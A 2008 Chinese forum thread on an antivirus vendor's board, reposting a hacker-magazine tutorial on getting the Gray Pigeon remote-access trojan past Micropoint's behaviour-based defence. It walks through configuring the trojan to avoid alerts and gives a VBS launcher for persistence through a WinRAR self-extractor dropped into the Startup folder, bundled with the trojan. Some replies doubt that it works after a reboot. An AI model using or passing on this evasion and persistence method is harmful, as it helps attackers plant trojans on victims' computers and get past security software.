Board logo

标题: 过微点主动防御 [打印本页]
作者: 月_翔     时间: 2008-2-25 11:58    标题: 过微点主动防御

本人在黑客防线上看到的:

这篇文章,只是给大家提供一个很好的思路,请大家再去挖掘更多的方法,突破微点主动东防御,今天使用鸽子来突破微点的主动防御,现说下如何来配置鸽子
安装路径选择D盘!因为经过我测试,如果文件释放到,系统目录下,任何位置,如windows,或者system32微点都会报警,所以选择其他盘符,这样就不会报警。启动项设置,如图2都不选择,让他留空,无论是写注册表或者写服务,都会报警,所以我们就不写,在填写高级选项, 只选择隐藏进程。不能选择插入IE,,选择插入IE,微点同样会报警,接下来生成服务端。
这样生成的木马微点就不会报警了!但是有个问题!虽然可以上线,但是从新启动后,就不能加载程序了!因为我们没有选择启动方式。这里我们需要通过另外的一种方式来弥补这个问题!让木马从新启动后,能够正常的运行上线!
我们使用VBS 写一段代码,让他运行指定位置的EXE,也就是说运行我们释放到D盘里面的鸽子,代码如下
On Error Resume Next
set wshshell=createobject ("wscript.shell" )
a=wshshell.run ("D:\iexplorer.exe -install 516 iloveyou",2)
,大家都能看懂把。我就不多说了。
接下来我们把这段代码用TXT文本改成VBS。我们用winrar自解压,如图4



让他释放到,C:\Documents and Settings\All Users\「开始」菜单\程序\启动 这这个目录下,生成自解压的EXE,随便起名字,到了最后了!我们使用捆绑器将生成的鸽子和用winrar封装过的vbs,捆绑到一起。就实现了完美过微点主动防御的这么一个小的利用方法。

最后说下总结,鸽子配置,不选择服务和注册表启动,不使用插入IE,(只要插入进程就会报警),把木马的释放路径选择为D:|盘,任意的名字。然后让写vbs,让vbs实现运行指定位置的程序,在使用winrar将vbs进行封装处理,让他释放到启动项里面。最后使用捆绑器将winrar自解压和鸽子捆绑到一起。微点防御无任何提示报警。

注明:花了一下午的时间进行了研究,很多地方还存在缺陷,不是很完美。算的上提供个思路给大家把!不管方法如何!起码能突破。

转帖注明:黑客防线首发  by:chike

有兴趣的组装一下看看能不能过。:o

[ Last edited by 月_翔 on 2008-2-25 at 12:00 ]
作者: 点饭的百度空间     时间: 2008-2-25 12:12    标题: AD

[200803目录]入侵手机、对抗微点主防、搜寻内核Rootkit、内核驱动检测隐藏进程、搜寻内核Rootkit
http://hi.baidu.com/micropoint/b ... proactive%20defense
作者: images     时间: 2008-2-25 12:31
貌似这个之前有人说过,重启后就被微点发现处理了。
作者: eaglesage     时间: 2008-2-26 12:43
是啊  貌似可以的



欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/) bbs.micropoint.com.cn